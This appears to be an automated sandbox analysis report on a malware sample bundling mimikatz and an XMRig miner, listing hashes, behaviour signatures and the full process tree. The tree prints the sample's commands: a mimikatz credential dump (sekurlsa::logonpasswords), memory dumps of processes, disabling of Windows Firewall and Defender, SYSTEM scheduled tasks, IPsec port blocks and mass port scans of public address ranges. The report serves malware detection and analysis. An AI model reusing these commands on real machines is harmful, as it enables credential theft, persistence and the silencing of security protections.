Overview

overview

10

Static

static

10

2024-12-06...tz.exe

windows7-x64

10

2024-12-06...tz.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-12-2024 06:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-12-06_64a533ec09900060b9b02b5c482becdd_hacktools_icedid_mimikatz.exe

  • Size

    6.8MB

  • MD5

    64a533ec09900060b9b02b5c482becdd

  • SHA1

    4b2df40f22a5b27be90ed5f79cdca8c8142f035c

  • SHA256

    f12c9626518d5addd4aa417d3dbcfdc85bd51822392e5f31df3237dc7e5e8079

  • SHA512

    7376bb2bc409374833a5002d04e2a9c123a3ba9f62b994ca2c4c4e1818075636d7527307d1f8dba056e0b1310c1b5f29741b51bab803f9ab08a036b18a92b1ef

  • SSDEEP

    196608:5po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:Ygjz0E57/iv1

Score
10/10
mimikatzxmrigcredential_accessdiscoveryevasionexecutionminerpersistenceprivilege_escalationupx

Malware Config

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

    mimikatz
  • Mimikatz family
    mimikatz
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Contacts a large (29950) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

    credential_access
  • XMRig Miner payload 12 IoCs
    miner
  • mimikatz is an open source tool to dump credentials on Windows 3 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
    persistence
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Creates a Windows Service
    persistence
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 3 IoCs
    installer
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2120
      • C:\Windows\TEMP\ltbmbiubv\ttittb.exe
        "C:\Windows\TEMP\ltbmbiubv\ttittb.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3956
    • C:\Users\Admin\AppData\Local\Temp\2024-12-06_64a533ec09900060b9b02b5c482becdd_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-12-06_64a533ec09900060b9b02b5c482becdd_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2972
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tmbllbvl\ibebikp.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2552
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3088
        • C:\Windows\tmbllbvl\ibebikp.exe
          C:\Windows\tmbllbvl\ibebikp.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3424
    • C:\Windows\tmbllbvl\ibebikp.exe
      C:\Windows\tmbllbvl\ibebikp.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4468
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3056
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2404
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1592
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
          • System Location Discovery: System Language Discovery
          PID:928
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2428
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1124
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:1632
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:2796
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:1416
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe /S
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2300
          • C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe
            C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2080
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1168
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:3980
            • C:\Windows\SysWOW64\net.exe
              net stop "TrueSight Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2268
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "TrueSight Meter"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1792
            • C:\Windows\SysWOW64\net.exe
              net stop npf
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4852
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop npf
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1420
            • C:\Windows\SysWOW64\net.exe
              net start npf
              4⤵
                PID:4040
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1912
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2556
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3012
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4564
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
              PID:1436
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4016
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4412
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\buzcwvvny\mmzbiruiz\Scant.txt
              2⤵
              • System Location Discovery: System Language Discovery
              PID:3860
              • C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe
                C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\buzcwvvny\mmzbiruiz\Scant.txt
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:3948
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\buzcwvvny\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\buzcwvvny\Corporate\log.txt
              2⤵
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:1644
              • C:\Windows\buzcwvvny\Corporate\vfshost.exe
                C:\Windows\buzcwvvny\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                3⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:624
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mpbkiglcb" /ru system /tr "cmd /c C:\Windows\ime\ibebikp.exe"
              2⤵
                PID:4468
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3840
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "mpbkiglcb" /ru system /tr "cmd /c C:\Windows\ime\ibebikp.exe"
                  3⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:3476
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fklitvbmu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F"
                2⤵
                  PID:3844
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                      PID:4104
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "fklitvbmu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F"
                      3⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:4512
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "jbtbicikb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4632
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2024
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "jbtbicikb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4480
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:3148
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:3184
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:872
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2788
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4036
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2988
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4756
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:60
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4072
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:3856
                  • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                    C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 788 C:\Windows\TEMP\buzcwvvny\788.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1228
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4456
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2932
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3348
                    • C:\Windows\SysWOW64\net.exe
                      net stop SharedAccess
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4840
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop SharedAccess
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3192
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                      PID:2260
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh firewall set opmode mode=disable
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:2416
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh Advfirewall set allprofiles state off
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:452
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh Advfirewall set allprofiles state off
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4488
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop MpsSvc
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:4196
                      • C:\Windows\SysWOW64\net.exe
                        net stop MpsSvc
                        3⤵
                          PID:1056
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop MpsSvc
                            4⤵
                              PID:1204
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop WinDefend
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2088
                          • C:\Windows\SysWOW64\net.exe
                            net stop WinDefend
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4552
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop WinDefend
                              4⤵
                                PID:2660
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c net stop wuauserv
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:1160
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:4368
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:1040
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config MpsSvc start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:920
                            • C:\Windows\SysWOW64\sc.exe
                              sc config MpsSvc start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:3088
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config SharedAccess start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:1804
                            • C:\Windows\SysWOW64\sc.exe
                              sc config SharedAccess start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:5092
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config WinDefend start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4472
                            • C:\Windows\SysWOW64\sc.exe
                              sc config WinDefend start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:2968
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config wuauserv start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:5016
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:1668
                          • C:\Windows\TEMP\xohudmc.exe
                            C:\Windows\TEMP\xohudmc.exe
                            2⤵
                            • Executes dropped EXE
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of SetWindowsHookEx
                            PID:1568
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 384 C:\Windows\TEMP\buzcwvvny\384.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2396
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2120 C:\Windows\TEMP\buzcwvvny\2120.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4060
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2752 C:\Windows\TEMP\buzcwvvny\2752.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4388
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2780 C:\Windows\TEMP\buzcwvvny\2780.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3544
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2076 C:\Windows\TEMP\buzcwvvny\2076.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2900
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2204 C:\Windows\TEMP\buzcwvvny\2204.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:928
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3768 C:\Windows\TEMP\buzcwvvny\3768.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4760
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3864 C:\Windows\TEMP\buzcwvvny\3864.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1056
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3924 C:\Windows\TEMP\buzcwvvny\3924.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:920
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4052 C:\Windows\TEMP\buzcwvvny\4052.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3800
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2288 C:\Windows\TEMP\buzcwvvny\2288.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:532
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4500 C:\Windows\TEMP\buzcwvvny\4500.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4588
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2232 C:\Windows\TEMP\buzcwvvny\2232.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4120
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2868 C:\Windows\TEMP\buzcwvvny\2868.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4012
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2244 C:\Windows\TEMP\buzcwvvny\2244.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1912
                          • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                            C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4616 C:\Windows\TEMP\buzcwvvny\4616.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:644
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c C:\Windows\buzcwvvny\mmzbiruiz\scan.bat
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4660
                            • C:\Windows\buzcwvvny\mmzbiruiz\lubvuzbtm.exe
                              lubvuzbtm.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                              3⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              PID:3056
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:1252
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1604
                            • C:\Windows\SysWOW64\cacls.exe
                              cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:5008
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              3⤵
                                PID:4552
                              • C:\Windows\SysWOW64\cacls.exe
                                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                3⤵
                                  PID:4964
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4544
                                • C:\Windows\SysWOW64\cacls.exe
                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:6108
                            • C:\Windows\SysWOW64\ewqksq.exe
                              C:\Windows\SysWOW64\ewqksq.exe
                              1⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of SetWindowsHookEx
                              PID:4920
                            • C:\Windows\system32\cmd.EXE
                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F
                              1⤵
                                PID:4440
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  2⤵
                                    PID:4944
                                  • C:\Windows\system32\cacls.exe
                                    cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F
                                    2⤵
                                      PID:3012
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F
                                    1⤵
                                      PID:4076
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        2⤵
                                          PID:4588
                                        • C:\Windows\system32\cacls.exe
                                          cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F
                                          2⤵
                                            PID:4012
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ibebikp.exe
                                          1⤵
                                            PID:4004
                                            • C:\Windows\ime\ibebikp.exe
                                              C:\Windows\ime\ibebikp.exe
